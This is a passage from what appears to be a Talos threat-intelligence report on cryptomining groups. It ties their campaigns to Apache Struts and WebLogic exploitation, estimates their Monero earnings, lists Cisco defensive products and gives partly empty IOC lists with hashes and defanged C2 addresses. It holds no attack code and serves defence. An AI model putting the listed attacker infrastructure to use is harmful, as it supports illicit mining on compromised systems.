We began to research the malware and infrastructure used in this campaign and found previous research on a similar campaign. That actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actor's C2, "check.hta:"

/win/checking-test.hta from previous campaign
check.hta

This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool.

Similarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw.

This malware was developed in Python and then converted to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.

Conclusion

Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.

The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue.

There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.

Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.

Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Rocke

IPs:

Domains:

URLs:

SHA-256:

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets

8220 Gang

Samples associated with whatMiner:

Wallets

Tor2mine


Uncategorized groups
